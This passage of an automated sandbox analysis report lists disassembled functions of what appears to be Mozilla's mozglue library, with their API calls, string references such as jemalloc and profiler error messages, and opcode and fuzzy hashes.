GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6664DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6664F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C666505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C666518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C66671C
GetCurrentProcess.KERNEL32 ref: 6C666724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C66672F
GetCurrentProcess.KERNEL32 ref: 6C666759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C666764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C666A80
GetSystemInfo.KERNEL32(?), ref: 6C666ABE
__Init_thread_footer.LIBCMT ref: 6C666AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AF7

Strings

detoured.dll, xrefs: 6C6664DA
_etoured.dll, xrefs: 6C6664ED
user32.dll, xrefs: 6C666526
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C666798
nvdxgiwrap.dll, xrefs: 6C666513
nvd3d9wrap.dll, xrefs: 6C666500

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction ID: 7cc53657b461bba9e13a34008fa2f976f06660de6afbf4b2ef5565db851e3b8a
Opcode Fuzzy Hash: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction Fuzzy Hash: 5CF1E6709052199FDB20CF26DC887DAB7B5AF46318F144299D809E3B41D731EE85CF9A

Function 6C6BC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C6BC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE472

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 07666fdb95abeea65de448be75d2845b17df2f4a7965e0ad538a7b64aa7667bc
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 5733AC71E0021A8FCB04CFA8C8806EDBBF2FF49314F288269D955BB755D731A956CB94

Function 6C67ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C67EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C67EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C681695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6816B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C681770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C681A3E

Strings

~qel, xrefs: 6C67ED10
~qel, xrefs: 6C67ED13

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~qel$~qel
API String ID: 3693777188-2922831641
Opcode ID: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction ID: 8fa18b222c337912a8b1ca23478ce27298b3960ccb6cabc63e13a2ac82a5fafa
Opcode Fuzzy Hash: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction Fuzzy Hash: 13B33971E01219CFCB24CFA8C890ADDB7B2BF49304F2585A9D459AB745D730AD86CFA4

Function 6C66FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE7B8), ref: 6C66FF81
LeaveCriticalSection.KERNEL32(6C6DE7B8), ref: 6C67022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C670240
EnterCriticalSection.KERNEL32(6C6DE768), ref: 6C67025B
LeaveCriticalSection.KERNEL32(6C6DE768), ref: 6C67027B

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C66FE99, 6C66FEB7, 6C66FED3, 6C670DB8, 6C670DD3, 6C6719B4
: (malloc) Error in VirtualFree(), xrefs: 6C670D67, 6C670D7B, 6C670DAC
<jemalloc>, xrefs: 6C670D62, 6C670D76, 6C670DA7

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction ID: e8992d00596065b3b005aafba80a9a854203beed125ea67ceae0e362e91cc08c
Opcode Fuzzy Hash: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction Fuzzy Hash: 01C20271A057418FD724CF28C590756BBE1BF85328F28CA6DE4698B7D5C732E801CBA9

Function 6C6BE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00004014), ref: 6C6BE811
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BEAA8
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BEBD5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BEEF6
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BF223
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C6BF322
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6C0E03
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C6C0E54
memcpy.VCRUNTIME140(?,?,?), ref: 6C6C0EAE
memcpy.VCRUNTIME140(?,?,?), ref: 6C6C0ED4

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: c8e1b55e4da7bfd3646139be31583bd68617d8375b9079d4d794990734b32e14
Instruction ID: 09fc73846ed4e5b5e4925d412a24fb1bb0b96869d3e965f44c9892b77a9da60c
Opcode Fuzzy Hash: c8e1b55e4da7bfd3646139be31583bd68617d8375b9079d4d794990734b32e14
Instruction Fuzzy Hash: F063AD75E0025A8FCB04CFA8C8806DDFBB2FF89304F298269D855BB755D730A946CB95

Function 6C693E50 Relevance: 28.8, APIs: 13, Strings: 3, Instructions: 765COMMON

Download Yara Rule

APIs

Part of subcall function 6C6B7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>il,?,?,?,6C693E7D,?,?), ref: 6C6B777C

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C693F17
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C693F5C
VerSetConditionMask.NTDLL ref: 6C693F8D
VerSetConditionMask.NTDLL ref: 6C693F99
VerSetConditionMask.NTDLL ref: 6C693FA0
VerSetConditionMask.NTDLL ref: 6C693FA7
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C693FB4

Strings

C>il, xrefs: 6C693E93
nvinit.dll, xrefs: 6C694479
nvd3d9wrap.dll, xrefs: 6C694466

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
String ID: C>il$nvd3d9wrap.dll$nvinit.dll
API String ID: 1189858803-416255230
Opcode ID: 90aaa3219a0734a8e10a1853969c769a5af7cb6c33ae41dd46dc9edeb52facce
Instruction ID: c4b7b43111936190e031cebce628acb0aecf7b3affde093ccdcb8ce31f9d9907
Opcode Fuzzy Hash: 90aaa3219a0734a8e10a1853969c769a5af7cb6c33ae41dd46dc9edeb52facce
Instruction Fuzzy Hash: 2452F531614B459FDB10DF348480ABBB7E9AF86304F04096DE5978BB82CB74F909CB68

Function 6C66FEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE7B8), ref: 6C66FF81
LeaveCriticalSection.KERNEL32(6C6DE7B8), ref: 6C67022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C670240
EnterCriticalSection.KERNEL32(6C6DE768), ref: 6C67025B
LeaveCriticalSection.KERNEL32(6C6DE768), ref: 6C67027B

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C66FE99, 6C66FEB7, 6C66FED3, 6C670DB8, 6C670DD3, 6C6719B4, 6C671A10
MOZ_CRASH(), xrefs: 6C670CA7

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: 377a90b1383cd4f6e410060cebd0b236d3e52c14ea21b1dc2458dfe8be273a8a
Instruction ID: c5f8d1fd12965b830365947a9c50168999fe390861b717d07dff7eeaa7903c5c
Opcode Fuzzy Hash: 377a90b1383cd4f6e410060cebd0b236d3e52c14ea21b1dc2458dfe8be273a8a
Instruction Fuzzy Hash: 99B2FE316057418FD724CF28C5D0716BBE1BF85328F28CA6DE86A8BB95C731E840CB69

Function 6C6A5600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON

Download Yara Rule

Strings

name, xrefs: 6C6A5E79, 6C6A5E8F
ProfileBuffer parse error: %s, xrefs: 6C6A5AC8, 6C6A5CBB
schema, xrefs: 6C6A606D
expected a Time entry, xrefs: 6C6A5CB6
expected a Count entry, xrefs: 6C6A5AC3
data, xrefs: 6C6A6131

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
API String ID: 0-2712937348
Opcode ID: 76e69116b1e6e1704ffc8b5cc9e5656b803a2a136cdc7f196174341f995c3bdf
Instruction ID: 15787890fe778cc31cb661b3cbed2d527a4f8242da0139c910558a72f95608e2
Opcode Fuzzy Hash: 76e69116b1e6e1704ffc8b5cc9e5656b803a2a136cdc7f196174341f995c3bdf
Instruction Fuzzy Hash: 1F926CB1A087418FD724CF59C49079AB7E1FFC9308F14891DE59A9B751DB30E80ACB9A

Function 6C6A2E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C6A2ED3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A2EE7
MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C6A2F0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A3214
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A3242
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A36BF

Strings

set , xrefs: 6C6A36EC
MOZ_PROFILER_SYMBOLICATE, xrefs: 6C6A378D
get , xrefs: 6C6A3205

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: strlen$AddressCode$DescribeDetailsFormat
String ID: MOZ_PROFILER_SYMBOLICATE$get $set
API String ID: 2257098003-3318126862
Opcode ID: 0f2f3cde56ae256f8e4f2838535945ccd874a002808d56f1c33e8a395cb1cd4e
Instruction ID: e335c5896470117f24a1d7905bca94b85fc95766e42619db47664e281dacefd1
Opcode Fuzzy Hash: 0f2f3cde56ae256f8e4f2838535945ccd874a002808d56f1c33e8a395cb1cd4e
Instruction Fuzzy Hash: 23325F706083818FD324CF64C4906AEF7E2AFCA318F54892DE59987751DB31E94ACB5B

Function 6C697E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

name, xrefs: 6C697ECF, 6C698335
vml, xrefs: 6C698207
schema, xrefs: 6C6981E3, 6C698311
(pre-xul), xrefs: 6C697E88
data, xrefs: 6C698280, 6C6983E1

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$vml
API String ID: 3412268980-1127494330
Opcode ID: 50d35162e2be8bb4c1390a11102234f542ceebbfd6a3dbc931716a11d87444ef
Instruction ID: d705e3e16f5a66896cbab592bcc7b139a249099473c9c99f12f19ba6965382d3
Opcode Fuzzy Hash: 50d35162e2be8bb4c1390a11102234f542ceebbfd6a3dbc931716a11d87444ef
Instruction Fuzzy Hash: 95E17EB1A043418BC710CF69884065BFBE9FBC5318F154A2DE899D7790DBB0ED498B9A

Function 6C67D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D6A6
LeaveCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D712
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D7EA

Strings

<jemalloc>, xrefs: 6C67D827
: (malloc) Error initializing arena, xrefs: 6C67D82C

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction ID: 8e5b2784bc4e44ae93db445447a53da21b8530f242c60e12b6fd494aaa9eed1f
Opcode Fuzzy Hash: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction Fuzzy Hash: 1991C471A047018FD764CF29C49076AB7E1EB89318F158D2EE55AC7B81D734E844CBAA

Function 6C6B4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C6B4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4F2E
moz_xmalloc.MOZGLUE ref: 6C6B4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C6B4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B52E6
Sleep.KERNEL32(00000010), ref: 6C6B5481
free.MOZGLUE(?), ref: 6C6B5498

Strings

(, xrefs: 6C6B5250

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: fb8675555285ac875c3de1cb55c2b124986113e0b03f320fa3a58dae27b9f0f6
Instruction ID: 4fb74f4d0ce92a9ec60c45ee6cd4a51cd83b2aaa59eff681b535a05e015bdd44
Opcode Fuzzy Hash: fb8675555285ac875c3de1cb55c2b124986113e0b03f320fa3a58dae27b9f0f6
Instruction Fuzzy Hash: E1F1B271A19B408FC716CF39C89062BB7F5AFE6384F058B2EF846A7651DB31D4428B85

Function 6C679E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C679EB8
LeaveCriticalSection.KERNEL32(?), ref: 6C679F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C679F34
LeaveCriticalSection.KERNEL32(?), ref: 6C67A823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67A83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67A849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C67A8B1, 6C67A8D4, 6C67A8EF

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: db17d2bc2b6b705c310f098b49b2b29c2677901b78e74add1f0f3777c2b96d9c
Instruction ID: c1827dcb3a360c7d673e696c750ffb37eae7622c7899b4964e0a10ca42f943cf
Opcode Fuzzy Hash: db17d2bc2b6b705c310f098b49b2b29c2677901b78e74add1f0f3777c2b96d9c
Instruction Fuzzy Hash: BA728D72A157118FD324CF28C540615FBE1BF89328F29CB6DE8698B792D335E841CB94

Function 6C6A2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C6A2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C6A2C61

Part of subcall function 6C654DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
Part of subcall function 6C654DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6A2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6A2E2D

Part of subcall function 6C6681B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6681DE

Strings

(root), xrefs: 6C6A354F
ProfileBuffer parse error: %s, xrefs: 6C6A2E3B
expected a Time entry, xrefs: 6C6A2E36

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction ID: c45b159c50666698707fa0529ec4367b72d96f9d0c3f7e5a65ee094248517380
Opcode Fuzzy Hash: 02e4312583ca8ec7a0c251b38ac92e337338f3bd8d8f9d95d7f3126bcdc41898
Instruction Fuzzy Hash: 4191CF706087408FC724DF65C48469EF7E1AFCA358F10492DE99A8B751DB30E94ACB5B

Function 6C6B9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C6B9F3D
__aulldiv.LIBCMT ref: 6C6B9F77
__aullrem.LIBCMT ref: 6C6B9F8C
__aulldiv.LIBCMT ref: 6C6BA023

Strings

NaN, xrefs: 6C6B9EAB
-Infinity, xrefs: 6C6B9E60, 6C6B9E7B

Memory Dump Source

